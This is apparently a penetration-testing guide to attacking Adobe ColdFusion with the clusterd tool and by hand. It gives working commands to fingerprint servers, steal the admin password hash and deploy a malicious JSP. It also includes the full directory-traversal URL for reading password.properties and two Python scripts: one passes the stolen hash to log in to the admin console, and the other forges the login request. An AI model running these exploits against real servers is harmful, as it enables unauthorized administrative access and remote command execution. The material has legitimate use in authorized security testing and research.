Coldfusion
ColdFusion is Adobe's web development framework. It supports Java JSPs as well as Adobe's own CFML (ColdFusion Markup Language). ColdFusion has been plagued with major security issues in the not too distant past. The following provides a quick breakdown:
- CF v9: Trivial authentication bypass on the Admin interface
- CF v6-10: Unauthenticated administrative "hash retrieval" attack
- CF v8: Unauthenticated remote command execution
- CF v6-9: Pass the hash style authentication
If access to the administrative interface can be gained, remote command execution is almost guaranteed to follow. Helping with this is the fact that the administrative login doesn't require a username, only the password.
Clusterd supports all of the above attack vectors.
The easiest way to fingerprint which version of ColdFusion is running on the remote server is to use the clusterd modules. Each version of CF ships slightly different images under /CFIDE/; clusterd contains hashes of the images that are unique to each version and compares them against the target. The administrative interface can be found at:
http://<host>:<port>/CFIDE/administrator/
To use the clusterd fingerprint module to identify the version, run:
sudo python clusterd.py -a coldfusion -i localhost -p 80
The most reliable (and most version-independent) way to attack ColdFusion is to combine the hash retrieval attack with pass-the-hash authentication and then deploy a malicious file to the server. To retrieve the admin hash using clusterd, use:
sudo python clusterd.py -a coldfusion -i localhost -p 80 --cf-hash
Once the hash has been retrieved, we may use clusterd to deploy a malicious JSP:
sudo python clusterd.py -a coldfusion -i localhost -p 80 --deploy ./src/lib/resources/cmd.jsp --deployer schedule_job --usr-auth <hash>
In the event that this fails, attacks may always be performed manually. Full details can be found in Attacking Adobe ColdFusion, the following provides a brief overview.
The administrative password hash retrieval is simply a directory traversal vulnerability that allows for local file disclosure. In this case we are interested in the ColdFusion admin properties file containing the hash. The following URL can be used to exploit this vulnerability, where <path> must be replaced with the local filesystem path to the target file:
http://<host>:<port>/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=<path>&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
The file containing the administrative password hash is password.properties and its exact location depends on the OS, ColdFusion version, and installation path of ColdFusion. Clusterd takes care of all of these messy details. If you need to exploit this manually, the paths can be found in fetch_hashes.py.
Authenticating to ColdFusion manually using "pass the hash" is a bit of a pain. The relevant code for constructing the authentication request has been extracted from clusterd and included here to demonstrate the method. In practice, if access to the admin console is required, simply proxy clusterd through Burp and intercept the cookies included with the authentication response:
```python
import hmac
from hashlib import sha1

from requests.utils import dict_from_cookiejar

# utility, LOG and _salt() are clusterd internals: utility wraps logging and
# requests, LOG holds the log levels, and _salt(url) fetches the per-request
# salt that the login form at /CFIDE/administrator/enter.cfm embeds.


def attemptPTH(url, usr_auth):
    """ In vulnerable instances of CF7-9, you can use --cf-hash to obtain
    the remote server's hash and pass it.

    usr_auth is either "<hash>" or "<user>:<hash>", where <hash> is the
    uppercase SHA1 hex value taken from password.properties.
    """
    utility.Msg("Attempting to pass the hash..", LOG.DEBUG)
    if ':' in usr_auth:
        (usr, pwhsh) = usr_auth.split(':', 1)
    else:
        (usr, pwhsh) = "admin", usr_auth
    # The login form's JavaScript submits HMAC-SHA1(salt, sha1hex(password)).
    # Since the stored hash already is sha1hex(password), the plaintext is
    # never needed; only the salt has to be fetched from the login page.
    salt = _salt(url)
    hsh = hmac.new(salt.encode(), pwhsh.encode(), sha1).hexdigest().upper()
    data = {"cfadminPassword": hsh,
            "requestedURL": "/CFIDE/administrator/enter.cfm?",
            "cfadminUserId": usr,
            "salt": salt,
            "submit": "Login"}
    try:
        res = utility.requests_post(url, data=data)
        # A successful login answers with a redirect (so res.history is
        # non-empty) whose Set-Cookie carries the admin session cookies.
        if res.status_code == 200 and len(res.history) > 0:
            utility.Msg("Successfully passed the hash", LOG.DEBUG)
            return (dict_from_cookiejar(res.history[0].cookies), None)
    except Exception as e:
        utility.Msg("Error authenticating: %s" % e, LOG.ERROR)
    return (None, None)
```
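The following is an added example (not clusterd's code) that ties the manual hash retrieval and pass-the-hash steps above together offline: it builds the l10n.cfm traversal URL for a chosen file, parses the contents of password.properties as it would come back from the server, normalises the result to the uppercase SHA1 hex form the login form expects (handling the encrypted=false case, where the file holds the plaintext password instead), and produces the login POST body for a given salt. The host, port, file path, salt and both properties files are constructed sample values, and the hash in them is simply SHA1("password"):

```python
import hmac
from hashlib import sha1
from urllib.parse import urlencode

# The traversal primitive from the page: l10n.cfm pulls in download.cfm,
# which then serves whatever local file `filename` points at.
TRAVERSAL_PAGE = "/CFIDE/adminapi/customtags/l10n.cfm"

# Constructed sample: what password.properties looks like on a CF8/9 host
# (encrypted=true means `password` is the uppercase SHA1 hex of the password).
SAMPLE_PROPERTIES_HASHED = """\
#Sat Jan 01 00:00:00 UTC 2011
rdspassword=
password=5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8
encrypted=true
"""

# Constructed sample of the edge case: encrypted=false stores the plaintext.
SAMPLE_PROPERTIES_PLAIN = """\
rdspassword=
password=password
encrypted=false
"""


def traversal_url(host, port, target_path):
    """Build the hash-retrieval URL for an arbitrary local file.

    target_path is relative to the download.cfm location, hence the ../
    sequences; the exact depth and install path differ per OS/version.
    """
    params = {
        "attributes.id": "it",
        "attributes.file": "../../administrator/mail/download.cfm",
        "filename": target_path,
        "attributes.locale": "it",
        "attributes.var": "it",
        "attributes.jscript": "false",
        "attributes.type": "text/html",
        "attributes.charset": "UTF-8",
        "thisTag.executionmode": "end",
        "thisTag.generatedContent": "htp",
    }
    # Keep '/' and '.' unencoded so the URL reads like the one on the page.
    return "http://%s:%d%s?%s" % (host, port, TRAVERSAL_PAGE,
                                  urlencode(params, safe="/."))


def parse_properties(text):
    """Minimal Java .properties reader: key=value lines, '#' comments.

    The disclosed file usually arrives embedded in an HTML page; stray
    markup lines simply become keys nobody asks for.
    """
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        props[key.strip()] = value.strip()
    return props


def admin_hash_from_properties(text):
    """Return the uppercase SHA1 hex the login form wants, or None.

    With encrypted=true the file already holds that value; with
    encrypted=false it holds the plaintext, which we hash ourselves.
    """
    props = parse_properties(text)
    value = props.get("password")
    if value is None:
        return None
    if props.get("encrypted", "false").lower() == "true":
        return value.upper()
    return sha1(value.encode()).hexdigest().upper()


def pth_token(salt, admin_hash):
    """HMAC-SHA1 keyed with the page salt over the stored hash, uppercased,
    which is exactly what the CF login JavaScript would send."""
    return hmac.new(salt.encode(), admin_hash.encode(), sha1).hexdigest().upper()


def login_form(salt, admin_hash, user="admin"):
    """The POST body for /CFIDE/administrator/enter.cfm."""
    return {
        "cfadminPassword": pth_token(salt, admin_hash),
        "requestedURL": "/CFIDE/administrator/enter.cfm?",
        "cfadminUserId": user,
        "salt": salt,
        "submit": "Login",
    }


if __name__ == "__main__":
    # Assumed target and a common CF8-on-Windows install path (sample values).
    print(traversal_url("10.0.0.5", 8500,
                        "../../../../../../ColdFusion8/lib/password.properties"))
    h = admin_hash_from_properties(SAMPLE_PROPERTIES_HASHED)
    print(login_form("1292857230578", h))
```

The salt passed to login_form must be the one scraped from the current login page response; CF rejects a token computed over a stale salt, which is why clusterd fetches it immediately before posting.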
With access to the administrative interface, the easiest way to gain a remote shell is to abuse the "task scheduler" to run a job. This was covered fairly thoroughly by Chris Gates: http://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers
In the event that nothing above is working, it may be possible to abuse a "local file inclusion" vulnerability in CF6-8.
Another option is database log injection as described in http://breenmachine.blogspot.com/2013/03/cool-coldfusion-post-exploitation.html . This attack has not been thoroughly tested and it is unclear which versions would be vulnerable other than CF9.